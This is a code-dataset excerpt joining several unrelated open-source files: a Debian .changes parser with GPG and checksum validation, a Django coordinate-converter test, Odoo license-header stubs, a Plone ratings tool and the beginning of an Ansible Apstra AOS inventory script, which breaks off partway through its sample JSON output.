the changes file, please\n see :meth:`get_changes_file`.\n \"\"\"\n return self.basename\n\n def get_changes_file(self):\n \"\"\"\n Return the full, absolute path to the changes file. For just the\n filename, please see :meth:`get_filename`.\n \"\"\"\n return os.path.join(self._directory, self.get_filename())\n\n def get_path(self, filename):\n \"\"\"\n Return the full, absolute path to a file referenced by the changes\n file.\n \"\"\"\n return os.path.join(self._directory, filename)\n\n def get_files(self):\n \"\"\"\n Returns a list of files referenced in the changes file, such as\n the .dsc, .deb(s), .orig.tar.gz, and .diff.gz or .debian.tar.gz.\n All strings in the array will be absolute paths to the files.\n \"\"\"\n return [os.path.join(self._directory, z['name'])\n for z in self._data['Files']]\n\n def keys(self):\n return self._data.keys()\n\n def __getitem__(self, key):\n \"\"\"\n Returns the value of the rfc822 key specified.\n\n ``key``\n Key of data to request.\n \"\"\"\n return self._data[key]\n\n def __contains__(self, key):\n \"\"\"\n Returns whether the specified RFC822 key exists.\n\n ``key``\n Key of data to check for existence.\n \"\"\"\n return key in self._data\n\n def get(self, key, default=None):\n \"\"\"\n Returns the value of the rfc822 key specified, but defaults\n to a specific value if not found in the rfc822 file.\n\n ``key``\n Key of data to request.\n\n ``default``\n Default return value if ``key`` does not exist.\n \"\"\"\n return self._data.get(key, default)\n\n def get_as_string(self, key):\n \"\"\"\n Returns the value of the rfc822 key specified as the original string.\n\n ``key``\n Key of data to request.\n \"\"\"\n return self._data.get_as_string(key)\n\n def get_component(self):\n \"\"\"\n Returns the component of the package.\n \"\"\"\n return self._parse_section(self._data['Files'][0]['section'])[0]\n\n def get_priority(self):\n \"\"\"\n Returns the priority of the package.\n \"\"\"\n return self._parse_section(self._data['Files'][0]['priority'])[1]\n\n def get_section(self):\n \"\"\"\n Returns the section of the package.\n \"\"\"\n return self._parse_section(self._data['Files'][0]['section'])[1]\n\n def get_dsc(self):\n \"\"\"\n Returns the name of the .dsc file.\n \"\"\"\n for item in self.get_files():\n if item.endswith('.dsc'):\n return item\n\n def get_pool_path(self):\n \"\"\"\n Returns the path the changes file would be\n \"\"\"\n return self._data.get_pool_path()\n\n def get_package_name(self):\n \"\"\"\n Returns the source package name\n \"\"\"\n return self.get(\"Source\")\n\n def _parse_section(self, section):\n \"\"\"\n Works out the component and section from the \"Section\" field.\n Sections like `python` or `libdevel` are in main.\n Sections with a prefix, separated with a forward-slash also show the\n component.\n It returns a list of strings in the form [component, section].\n\n For example, `non-free/python` has component `non-free` and section\n `python`.\n\n ``section``\n Section name to parse.\n \"\"\"\n if '/' in section:\n return section.split('/')\n else:\n return ['main', section]\n\n def set_directory(self, directory):\n if directory:\n self._directory = directory\n else:\n self._directory = \"\"\n\n def validate(self, check_hash=\"sha1\", check_signature=True):\n \"\"\"\n See :meth:`validate_checksums` for ``check_hash``, and\n :meth:`validate_signature` if ``check_signature`` is True.\n \"\"\"\n self.validate_checksums(check_hash)\n if check_signature:\n self.validate_signature(check_signature)\n else:\n logger.info(\"Not checking signature\")\n\n @tool_required('gpg')\n def validate_signature(self, check_signature=True):\n \"\"\"\n Validate the GPG signature of a .changes file.\n\n Throws a :class:`dput.exceptions.ChangesFileException` if there's\n an issue with the GPG signature. Returns the GPG key ID.\n \"\"\"\n pipe = subprocess.Popen(\n [\"gpg\", \"--status-fd\", \"1\", \"--verify\", \"--batch\",\n self.get_changes_file()],\n shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n gpg_output, gpg_output_stderr = pipe.communicate()\n print(gpg_output)\n\n if pipe.returncode != 0:\n raise ChangesFileException(\n \"Unknown problem while verifying signature\")\n\n # contains verbose human readable GPG information\n gpg_output_stderr = str(gpg_output_stderr, encoding='utf8')\n print(gpg_output_stderr)\n\n gpg_output = gpg_output.decode(encoding='UTF-8')\n\n if gpg_output.count('[GNUPG:] GOODSIG'):\n pass\n elif gpg_output.count('[GNUPG:] BADSIG'):\n raise ChangesFileException(\"Bad signature\")\n elif gpg_output.count('[GNUPG:] ERRSIG'):\n raise ChangesFileException(\"Error verifying signature\")\n elif gpg_output.count('[GNUPG:] NODATA'):\n raise ChangesFileException(\"No signature on\")\n else:\n raise ChangesFileException(\n \"Unknown problem while verifying signature\"\n )\n\n key = None\n for line in gpg_output.split(\"\\n\"):\n if line.startswith('[GNUPG:] VALIDSIG'):\n key = line.split()[2]\n return key\n\n def validate_checksums(self, check_hash=\"sha1\"):\n \"\"\"\n Validate checksums for a package, using ``check_hack``'s type\n to validate the package.\n\n Valid ``check_hash`` types:\n\n * sha1\n * sha256\n * md5\n * md5sum\n \"\"\"\n logger.debug(\"validating %s checksums\", check_hash)\n\n for filename in self.get_files():\n if check_hash == \"sha1\":\n hash_type = hashlib.sha1()\n checksums = self.get(\"Checksums-Sha1\")\n field_name = \"sha1\"\n elif check_hash == \"sha256\":\n hash_type = hashlib.sha256()\n checksums = self.get(\"Checksums-Sha256\")\n field_name = \"sha256\"\n elif check_hash == \"md5\":\n hash_type = hashlib.md5()\n checksums = self.get(\"Files\")\n field_name = \"md5sum\"\n\n changed_files = None # appease pylint\n for changed_files in checksums:\n if changed_files['name'] == os.path.basename(filename):\n break\n else:\n assert(\n \"get_files() returns different files than Files: knows?!\")\n\n with open(os.path.join(self._directory, filename), \"rb\") as fc:\n while True:\n chunk = fc.read(131072)\n if not chunk:\n break\n hash_type.update(chunk)\n fc.close()\n\n if not hash_type.hexdigest() == changed_files[field_name]:\n raise ChangesFileException(\n \"Checksum mismatch for file %s: %s != %s\" % (\n filename,\n hash_type.hexdigest(),\n changed_files[field_name]\n ))\n else:\n logger.debug(\"%s Checksum for file %s matches\",\n field_name, filename)\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2441,"cells":{"repo_name":{"kind":"string","value":"venicegeo/eventkit-cloud"},"path":{"kind":"string","value":"eventkit_cloud/utils/tests/test_coordinate_converter.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"2036"},"content":{"kind":"string","value":"import json\nimport logging\n\nimport requests_mock\nfrom django.conf import settings\nfrom django.test import TestCase, override_settings\n\nfrom eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter\n\nlogger = logging.getLogger(__name__)\nmockURL = \"http://test.test\"\n\n@override_settings(GEOCODING_AUTH_URL=None)\nclass TestConvert(TestCase):\n\n def setUp(self):\n self.mock_requests = requests_mock.Mocker()\n self.mock_requests.start()\n self.addCleanup(self.mock_requests.stop)\n\n settings.CONVERT_API_URL = mockURL\n\n def test_convert_success(self):\n convert_response_success = {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Point\",\n \"coordinates\": [\n -112.61869345019069,\n 50.00105275281522\n ]\n },\n \"properties\": {\n \"name\": \"12UUA8440\",\n \"from\": \"mgrs\",\n \"to\": \"decdeg\"\n }\n }\n\n self.mock_requests.get(mockURL, text=json.dumps(convert_response_success), status_code=200)\n convert = CoordinateConverter()\n result = convert.get(\"18S TJ 97100 03003\")\n self.assertIsNotNone(result.get(\"geometry\"))\n self.assertEqual(result.get(\"type\"), \"Feature\")\n properties = result.get(\"properties\")\n geometry = result.get(\"geometry\")\n self.assertIsInstance(properties, dict)\n self.assertIsInstance(geometry, dict)\n self.assertEqual(geometry.get(\"type\"), \"Point\")\n self.assertIsInstance(geometry.get(\"coordinates\"), list)\n\n def test_convert_fail(self):\n convert_response_fail = {\n \"properties\": {\n \"name\": \"12UUA844\",\n \"from\": \"mgrs\",\n \"to\": \"decdeg\"\n }\n }\n\n with self.assertRaises(Exception):\n self.mock_requests.get(mockURL, text=json.dumps(convert_response_fail), status_code=500)\n CoordinateConverter().get_data()\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2442,"cells":{"repo_name":{"kind":"string","value":"wangjun/odoo"},"path":{"kind":"string","value":"addons/l10n_de/__init__.py"},"copies":{"kind":"string","value":"693"},"size":{"kind":"string","value":"1057"},"content":{"kind":"string","value":"# -*- encoding: utf-8 -*-\n##############################################################################\n# \n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2009 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see . \n#\n##############################################################################\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2443,"cells":{"repo_name":{"kind":"string","value":"tinkerthaler/odoo"},"path":{"kind":"string","value":"addons/resource/__init__.py"},"copies":{"kind":"string","value":"448"},"size":{"kind":"string","value":"1086"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n##############################################################################\n# \n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2009 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see . \n#\n##############################################################################\n\nimport resource\nimport faces\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2444,"cells":{"repo_name":{"kind":"string","value":"Cenditel/cenditel.comunidades.cynin"},"path":{"kind":"string","value":"products/ATRatings/RatingsTool.py"},"copies":{"kind":"string","value":"4"},"size":{"kind":"string","value":"13993"},"content":{"kind":"string","value":"import os, sys\r\nimport urllib\r\nimport Globals\r\nfrom AccessControl import ClassSecurityInfo\r\nfrom DateTime import DateTime\r\nfrom OFS.SimpleItem import SimpleItem\r\nfrom Acquisition import aq_base\r\n\r\nfrom Products.Archetypes.Referenceable import Referenceable\r\nfrom OFS.PropertyManager import PropertyManager\r\nfrom Products.CMFCore.utils import UniqueObject, getToolByName\r\nfrom Products.CMFPlone.PloneBaseTool import PloneBaseTool\r\nfrom Products.PageTemplates.PageTemplateFile import PageTemplateFile\r\n\r\n# lazy way of configuring this tool\r\nfrom config import MIN_RATING_VALUE, MAX_RATING_VALUE, STORAGE_CLASS, STORAGE_ARGS, NEUTRAL_RATING_VALUE\r\nfrom Permissions import ADD_RATING_PERMISSION\r\nfrom Products.CMFCore.permissions import ManagePortal\r\n\r\nfrom ZODBStorage import HITS_SUMMARY_ID, RATINGS_SUMMARY_ID\r\n# ##############################################################################\r\nclass RatingsTool(PloneBaseTool, UniqueObject, SimpleItem, Referenceable, PropertyManager):\r\n \"\"\" \"\"\"\r\n id = 'portal_ratings'\r\n meta_type= 'Ratings Tool'\r\n# toolicon = 'skins/plone_images/favorite_icon.gif'\r\n security = ClassSecurityInfo()\r\n isPrincipiaFolderish = 0\r\n storage = None\r\n\r\n __implements__ = (PloneBaseTool.__implements__, SimpleItem.__implements__, )\r\n\r\n manage_options = ( ({'label':'Overview', 'action':'manage_overview'},) +\r\n PropertyManager.manage_options + SimpleItem.manage_options)\r\n\r\n security.declareProtected(ManagePortal, 'manage_overview')\r\n manage_overview = PageTemplateFile('www/portal_ratings_manage_overview', globals())\r\n manage_overview.__name__ = 'manage_overview'\r\n manage_overview._need__name__ = 0\r\n\r\n manage_main = manage_overview\r\n\r\n _properties = PropertyManager._properties + (\r\n {'id':'allowed_rating_types', 'type': 'lines', 'mode':'w',\r\n 'label':'Allowed raing types'},\r\n {'id':'allowed_counting_types', 'type': 'lines', 'mode':'w',\r\n 'label':'Allowed hit counting types'},\r\n )\r\n\r\n allowed_rating_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]\r\n allowed_counting_types = ['Document', 'News Item', 'File', 'Image', 'Link', ]\r\n\r\n def isRatingAllowedFor(self, content):\r\n \"\"\" do content allow rating?\r\n\r\n Add a 'allowRatings' boolean property to the context to enable it\"\"\"\r\n allowRatings = getattr(content, 'enableRatings', 1)\r\n if not allowRatings:\r\n return 0\r\n if content.getPortalTypeName() not in self.allowed_rating_types:\r\n return 0\r\n return hasattr(aq_base(content), 'UID')\r\n\r\n def isCountingAllowedFor(self, content):\r\n \"\"\" do the content allow hit count\r\n\r\n Add a 'allowCountings' boolean property to the context to enable it\"\"\"\r\n allowCountings = getattr(content, 'enableCountings', 0)\r\n if not allowCountings:\r\n return 0\r\n if content.getPortalTypeName() not in self.allowed_counting_types:\r\n return 0\r\n return hasattr(aq_base(content), 'UID')\r\n \r\n security.declarePublic('getCyninRating')\r\n def getCyninRating(self,uid):\r\n cyninrating = self._getCyninRating(uid)\r\n if cyninrating is None: \r\n return None\r\n else:\r\n return cyninrating\r\n \r\n security.declarePublic('getCyninRatingCount')\r\n def getCyninRatingCount(self,uid):\r\n return self._getCyninRatingCount(uid)\r\n \r\n security.declarePublic('getTopRatingsAll')\r\n def getTopRatingsAll(self,brains):\r\n \"\"\" get top n hot contents from catalog brains \"\"\"\r\n results = []\r\n for brain in brains:\r\n value = self._getCyninRating(brain.UID) \r\n if value <> None:\r\n ratecount = self.getRatingCount(brain.UID)\r\n cyninratingcount = self._getCyninRatingCount(brain.UID)\r\n results.append( (value, brain, ratecount, cyninratingcount))\r\n \r\n def sortlist(x,y):\r\n if cmp(y[0],x[0]) != 0:\r\n return cmp(y[0],x[0])\r\n else:\r\n return cmp(y[2],x[2])\r\n \r\n results.sort(lambda x,y:sortlist(x,y));\r\n return results\r\n \r\n security.declarePublic('getTopRatings')\r\n def getTopRatings(self, brains, limit=5):\r\n \"\"\" get top n hot contents from catalog brains \"\"\"\r\n results = []\r\n results = self.getTopRatingsAll(brains)\r\n return results[:limit]\r\n\r\n security.declarePublic('getBadRatings')\r\n def getBadRatings(self, brains, limit=5):\r\n \"\"\" get bad ratings from catalog brains \"\"\"\r\n results = []\r\n for brain in brains:\r\n value = self.getRatingMean(brain.UID)\r\n if value:\r\n results.append((value, brain))\r\n\r\n results.sort(lambda x,y:cmp(x[0], y[0])) \r\n return results[:limit]\r\n\r\n security.declarePublic('getTopCountings')\r\n def getTopCountings(self, brains, limit=5):\r\n \"\"\" get top n hot contents from catalog brains \"\"\"\r\n results = []\r\n for brain in brains:\r\n count = self.getHitCount(brain.UID)\r\n if count:\r\n results.append((count, brain))\r\n\r\n results.sort(lambda x,y:cmp(y[0], x[0]))\r\n return results[:limit]\r\n\r\n security.declarePublic('getBadCountings')\r\n def getBadCountings(self, brains, limit=5):\r\n \"\"\" get top n cold contents from catalog brains \"\"\"\r\n results = []\r\n for brain in brains:\r\n count = self.getHitCount(brain.UID)\r\n if count:\r\n results.append((count, brain))\r\n\r\n results.sort(lambda x,y:cmp(x[0], y[0]))\r\n return results[:limit]\r\n\r\n def addRating(self, rating, uid):\r\n mt = getToolByName(self, 'portal_membership')\r\n if mt.isAnonymousUser():\r\n raise ValueError, 'Anonymous user cannot rate content'\r\n\r\n # check permission\r\n reference_catalog = getToolByName(self, 'reference_catalog')\r\n object = reference_catalog.lookupObject(uid)\r\n mt.checkPermission(ADD_RATING_PERMISSION, object)\r\n\r\n member = mt.getAuthenticatedMember()\r\n username = member.getUserName()\r\n\r\n old_rating = self._getUserRating(uid, username)\r\n if old_rating is not None:\r\n self._deleteRating(uid, username)\r\n return self._addRating(rating, uid, username)\r\n\r\n def getUserRating(self, uid, username=None):\r\n if username is None:\r\n mt = getToolByName(self, 'portal_membership')\r\n if mt.isAnonymousUser():\r\n raise ValueError, 'Anonymous user cannot rate content'\r\n member = mt.getAuthenticatedMember()\r\n username = member.getUserName()\r\n return self._getUserRating(uid, username)\r\n\r\n def addHit(self, uid):\r\n self._getStorage().addHit(uid)\r\n\r\n # Summary statistics: HITS\r\n\r\n # hits for individual item\r\n def getHitCount(self, uid):\r\n return self._getStorage().getHitCount(uid) or 0\r\n\r\n # hits for all items\r\n def getTotalHitCount(self):\r\n return self._getHitsSummary().getCount()\r\n\r\n def getHitRateTimeInterval(self):\r\n return HIT_RATE_TIME_INTERVAL\r\n\r\n def getHitRate(self, uid):\r\n return self._getStorage().getHitRate(uid)\r\n\r\n\r\n # Summary statistics: RATINGS\r\n\r\n def getMinRating(self):\r\n return MIN_RATING_VALUE\r\n\r\n def getMaxRating(self):\r\n return MAX_RATING_VALUE\r\n\r\n # rating stats for individual items\r\n def getRatingCount(self, uid):\r\n return self._getStorage().getRatingCount(uid)\r\n\r\n def getRatingSum(self, uid):\r\n return self._getStorage().getSum(uid)\r\n\r\n def getRatingSumSquared(self, uid):\r\n return self._getStorage().getSumSquared(uid)\r\n\r\n def getRatingMean(self, uid):\r\n ratingMean = self._getStorage().getMean(uid)\r\n if ratingMean == None:\r\n return 0\r\n else:\r\n return ratingMean\r\n\r\n def getRatingStdDev(self, uid):\r\n return self._getStorage().getStdDev(uid)\r\n\r\n def getRatingVariance(self, uid):\r\n return self._getStorage().getVariance(uid)\r\n\r\n # rating stats for all items\r\n def getTotalRatingCount(self):\r\n \"\"\"a count of rating means.\"\"\"\r\n return self._getStorage().getTotalRatingCount()\r\n\r\n def getRatingMeanCount(self):\r\n \"\"\"a count of rating means.\"\"\"\r\n return self._getStorage().getRatingMeanCount()\r\n\r\n def getRatingMeanSum(self):\r\n \"\"\"return a sum of rating means.\"\"\"\r\n return self._getStorage().getRatingMeanSum()\r\n\r\n def getRatingMeanSumSquared(self):\r\n \"\"\"a sum of rating means squared.\"\"\"\r\n return self._getStorage().getRatingMeanSumSquared()\r\n\r\n def getRatingMeanMean(self):\r\n \"\"\"a mean of rating means.\"\"\"\r\n return self._getStorage().getRatingMeanMean()\r\n\r\n def getRatingMeanStdDev(self):\r\n \"\"\"a standard deviation of rating means.\"\"\"\r\n return self._getStorage().getRatingMeanStdDev()\r\n\r\n def getRatingMeanVariance(self):\r\n \"\"\"a standard deviation of rating means\"\"\"\r\n return self._getStorage().getRatingMeanVariance()\r\n\r\n def getNoiseVariance(self):\r\n return self._getStorage().getNoiseVariance()\r\n\r\n def getEstimatedRating(self, uid):\r\n \"\"\"Use a Bayesian MMSE estimator for DC in white Gaussian noise to\r\n estimate the true rating for an item.\r\n\r\n Motivation: a small number of very positive or very negative ratings\r\n can make an item look much better or worse than it actually is. We\r\n use a statistical technique to reduce this kind of small number bias.\r\n Essentially we assume that true ratings have a Gaussian distribution.\r\n Most true ratings are somewhere in the middle, with small numbers\r\n very high and small numbers very low. User ratings for an item are\r\n the item's true rating + some Gaussian noise. User ratings are\r\n mostly close to the true rating, with a few much higher and a few\r\n much lower.\r\n\r\n We estimate a prior distribution of true means and the noise level\r\n from all the data. We then use this prior info for the Bayesian\r\n estimator. See _Fundamentals of Statistical Signal Processing_, by\r\n Alan Kay, pp. 316 - 321 for details.\r\n \"\"\"\r\n\r\n priorMean = self.getRatingMeanMean()\r\n noiseVariance = self.getNoiseVariance()\r\n itemMean = self.getRatingMean(uid)\r\n\r\n if priorMean is None or noiseVariance is None:\r\n # not enough information to compute a prior -- just return the mean\r\n if itemMean is None:\r\n # no data for computing a mean -- return the middle rating\r\n return 0.5 * (float(self.getMinRating()) + float(self.getMaxRating()))\r\n return itemMean\r\n\r\n if itemMean is None:\r\n return priorMean\r\n\r\n priorVariance = self.getRatingMeanVariance()\r\n\r\n if priorVariance == 0.0 and noiseVariance == 0.0:\r\n return itemMean\r\n\r\n itemRatings = self.getRatingCount(uid)\r\n\r\n alpha = priorVariance / (priorVariance + noiseVariance/itemRatings)\r\n return alpha * itemMean + (1.0 - alpha) * priorMean\r\n\r\n\r\n # private interface\r\n def _getStorage(self):\r\n if self.storage is None:\r\n self.storage = STORAGE_CLASS(**STORAGE_ARGS)\r\n return self.storage\r\n\r\n def _addRating(self, rating, uid, username):\r\n # delegate to storage\r\n self._getStorage().addRating(rating, uid, username)\r\n\r\n def _deleteRating(self, uid, username):\r\n # delegate to storage\r\n self._getStorage().deleteRating(uid, username)\r\n\r\n def _getUserRating(self, uid, username):\r\n # delegate to storage \r\n return self._getStorage().getUserRating(uid, username)\r\n\r\n def _deleteRatingsFor(self, uid):\r\n # delegate to storage\r\n return self._getStorage().deleteRatingsFor(uid)\r\n \r\n def _getCyninRating(self,uid): \r\n returnvalue = None\r\n \r\n objRating = self._getStorage()._getObjectRatings(uid,0)\r\n if objRating:\r\n repository = objRating.repository\r\n keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]\r\n if len(keyslist) == 0:\r\n returnvalue = None\r\n else:\r\n returnvalue = 0\r\n for eachkey in keyslist:\r\n value = repository.get(eachkey,None)\r\n if value and isinstance(value,int): \r\n if value == NEUTRAL_RATING_VALUE:\r\n self._deleteRating(uid,eachkey)\r\n else:\r\n returnvalue = returnvalue + (value - NEUTRAL_RATING_VALUE)\r\n \r\n return returnvalue\r\n \r\n def _getCyninRatingCount(self,uid):\r\n result = {'positive':0,'negative':0,'positivescore':0,'negativescore':0}\r\n \r\n objRating = self._getStorage()._getObjectRatings(uid,0)\r\n if objRating:\r\n repository = objRating.repository\r\n keyslist = [k for k in repository.keys() if k not in (HITS_SUMMARY_ID,RATINGS_SUMMARY_ID)]\r\n \r\n for eachkey in keyslist:\r\n value = repository.get(eachkey,None)\r\n if value and isinstance(value,int): \r\n if value > NEUTRAL_RATING_VALUE:\r\n result['positive'] = result['positive'] + 1\r\n result['positivescore'] = result['positivescore'] + (value - NEUTRAL_RATING_VALUE)\r\n elif value < NEUTRAL_RATING_VALUE:\r\n result['negative'] = result['negative'] + 1\r\n result['negativescore'] = result['negativescore'] + (value - NEUTRAL_RATING_VALUE)\r\n \r\n return result\r\n \r\nGlobals.InitializeClass(RatingsTool)\r\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2445,"cells":{"repo_name":{"kind":"string","value":"pchauncey/ansible"},"path":{"kind":"string","value":"contrib/inventory/apstra_aos.py"},"copies":{"kind":"string","value":"14"},"size":{"kind":"string","value":"20398"},"content":{"kind":"string","value":"#!/usr/bin/env python\n#\n# (c) 2017 Apstra Inc, \n#\n# This file is part of Ansible\n#\n# Ansible is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ansible. If not, see .\n#\n\"\"\"\nApstra AOS external inventory script\n====================================\n\nAnsible has a feature where instead of reading from /etc/ansible/hosts\nas a text file, it can query external programs to obtain the list\nof hosts, groups the hosts are in, and even variables to assign to each host.\n\nTo use this:\n - copy this file over /etc/ansible/hosts and chmod +x the file.\n - Copy both files (.py and .ini) in your preferred directory\n\nMore information about Ansible Dynamic Inventory here\nhttp://unix.stackexchange.com/questions/205479/in-ansible-dynamic-inventory-json-can-i-render-hostvars-based-on-the-hostname\n\n2 modes are currently, supported: **device based** or **blueprint based**:\n - For **Device based**, the list of device is taken from the global device list\n the serial ID will be used as the inventory_hostname\n - For **Blueprint based**, the list of device is taken from the given blueprint\n the Node name will be used as the inventory_hostname\n\nInput parameters parameter can be provided using either with the ini file or by using Environment Variables:\nThe following list of Environment Variables are supported: AOS_SERVER, AOS_PORT, AOS_USERNAME, AOS_PASSWORD, AOS_BLUEPRINT\nThe config file takes precedence over the Environment Variables\n\nTested with Apstra AOS 1.1\n\nThis script has been inspired by the cobbler.py inventory. thanks\n\nAuthor: Damien Garros (@dgarros)\nVersion: 0.2.0\n\"\"\"\nimport json\nimport os\nimport re\nimport sys\n\ntry:\n import argparse\n HAS_ARGPARSE = True\nexcept ImportError:\n HAS_ARGPARSE = False\n\ntry:\n from apstra.aosom.session import Session\n HAS_AOS_PYEZ = True\nexcept ImportError:\n HAS_AOS_PYEZ = False\n\nfrom ansible.module_utils.six.moves import configparser\n\n\n\"\"\"\n##\nExpected output format in Device mode\n{\n \"Cumulus\": {\n \"hosts\": [\n \"52540073956E\",\n \"52540022211A\"\n ],\n \"vars\": {}\n },\n \"EOS\": {\n \"hosts\": [\n \"5254001CAFD8\",\n \"525400DDDF72\"\n ],\n \"vars\": {}\n },\n \"Generic Model\": {\n \"hosts\": [\n \"525400E5486D\"\n ],\n \"vars\": {}\n },\n \"Ubuntu GNU/Linux\": {\n \"hosts\": [\n \"525400E5486D\"\n ],\n \"vars\": {}\n },\n \"VX\": {\n \"hosts\": [\n \"52540073956E\",\n \"52540022211A\"\n ],\n \"vars\": {}\n },\n \"_meta\": {\n \"hostvars\": {\n \"5254001CAFD8\": {\n \"agent_start_time\": \"2017-02-03T00:49:16.000000Z\",\n \"ansible_ssh_host\": \"172.20.52.6\",\n \"aos_hcl_model\": \"Arista_vEOS\",\n \"aos_server\": \"\",\n \"aos_version\": \"AOS_1.1.1_OB.5\",\n \"comm_state\": \"on\",\n \"device_start_time\": \"2017-02-03T00:47:58.454480Z\",\n \"domain_name\": \"\",\n \"error_message\": \"\",\n \"fqdn\": \"localhost\",\n \"hostname\": \"localhost\",\n \"hw_model\": \"vEOS\",\n \"hw_version\": \"\",\n \"is_acknowledged\": false,\n \"mgmt_ifname\": \"Management1\",\n \"mgmt_ipaddr\": \"172.20.52.6\",\n \"mgmt_macaddr\": \"52:54:00:1C:AF:D8\",\n \"os_arch\": \"x86_64\",\n \"os_family\": \"EOS\",\n \"os_version\": \"4.16.6M\",\n \"os_version_info\": {\n \"build\": \"6M\",\n \"major\": \"4\",\n \"minor\": \"16\"\n },\n \"serial_number\": \"5254001CAFD8\",\n \"state\": \"OOS-QUARANTINED\",\n \"vendor\": \"Arista\"\n },\n \"52540022211A\": {\n \"agent_start_time\": \"2017-02-03T00:45:22.000000Z\",\n \"ansible_ssh_host\": \"172.20.52.7\",\n \"aos_hcl_model\": \"Cumulus_VX\",\n \"aos_server\": \"172.20.52.3\",\n \"aos_version\": \"AOS_1.1.1_OB.5\",\n \"comm_state\": \"on\",\n \"device_start_time\": \"2017-02-03T00:45:11.019189Z\",\n \"domain_name\": \"\",\n \"error_message\": \"\",\n \"fqdn\": \"cumulus\",\n \"hostname\": \"cumulus\",\n \"hw_model\": \"VX\",\n \"hw_version\": \"\",\n \"is_acknowledged\": false,\n \"mgmt_ifname\": \"eth0\",\n \"mgmt_ipaddr\": \"172.20.52.7\",\n \"mgmt_macaddr\": \"52:54:00:22:21:1a\",\n \"os_arch\": \"x86_64\",\n \"os_family\": \"Cumulus\",\n \"os_version\": \"3.1.1\",\n \"os_version_info\": {\n \"build\": \"1\",\n \"major\": \"3\",\n \"minor\": \"1\"\n },\n \"serial_number\": \"52540022211A\",\n \"state\": \"OOS-QUARANTINED\",\n \"vendor\": \"Cumulus\"\n },\n \"52540073956E\": {\n \"agent_start_time\": \"2017-02-03T00:45:19.000000Z\",\n \"ansible_ssh_host\": \"172.20.52.8\",\n \"aos_hcl_model\": \"Cumulus_VX\",\n \"aos_server\": \"172.20.52.3\",\n \"aos_version\": \"AOS_1.1.1_OB.5\",\n \"comm_state\": \"on\",\n \"device_start_time\": \"2017-02-03T00:45:11.030113Z\",\n \"domain_name\": \"\",\n \"error_message\": \"\",\n \"fqdn\": \"cumulus\",\n \"hostname\": \"cumulus\",\n \"hw_model\": \"VX\",\n \"hw_version\": \"\",\n \"is_acknowledged\": false,\n \"mgmt_ifname\": \"eth0\",\n \"mgmt_ipaddr\": \"172.20.52.8\",\n \"mgmt_macaddr\": \"52:54:00:73:95:6e\",\n \"os_arch\": \"x86_64\",\n \"os_family\": \"Cumulus\",\n \"os_version\": \"3.1.1\",\n \"os_version_info\": {\n \"build\": \"1\",\n \"major\": \"3\",\n \"minor\": \"1\"\n },\n \"serial_number\": \"52540073956E\",\n \"state\": \"OOS-QUARANTINED\",\n \"vendor\": \"Cumulus\"\n },\n \"525400DDDF72\": {\n \"agent_start_time\": \"2017-02-03T00:49:07.000000Z\",\n \"ansible_ssh_host\": \"172.20.52.5\",\n \"aos_hcl_model\": \"Arista_vEOS\",\n \"aos_server\": \"\",\n \"aos_version\": \"AOS_1.1.1_OB.5\",\n \"comm_state\": \"on\",\n \"device_start_time\": \"2017-02-03T00:47:46.929921Z\",\n \"domain_name\": \"\",\n \"error_message\": \"\",\n \"fqdn\": \"localhost\",\n \"hostname\": \"localhost\",\n \"hw_model\": \"vEOS\",\n \"hw_version\": \"\",\n \"is_acknowledged\": false,\n \"mgmt_ifname\": \"Management1\",\n \"mgmt_ipaddr\": \"172.20.52.5\",\n \"mgmt_macaddr\": \"52:54:00:DD:DF:72\",\n \"os_arch\": \"x86_64\",\n \"os_family\": \"EOS\",\n \"os_version\": \"4.16.6M\",\n \"os_version_info\": {\n \"build\": \"6M\",\n \"major\": \"4\",\n \"minor\": \"16\"\n },\n \"serial_number\": \"525400DDDF72\",\n \"state\": \"OOS-QUARANTINED\",\n \"vendor\": \"Arista\"\n },\n \"525400E5486D\": {\n \"agent_start_time\": \"2017-02-02T18:44:42.000000Z\",\n \"ansible_ssh_host\": \"172.20.52.4\",\n \"aos_hcl_model\": \"Generic_Server_1RU_1x10G\",\n \"aos_server\": \"172.20.52.3\",\n \"aos_version\": \"AOS_1.1.1_OB.5\",\n \"comm_state\": \"on\",\n \"device_start_time\": \"2017-02-02T21:11:25.188734Z\",\n \"domain_name\": \"\",\n \"error_message\": 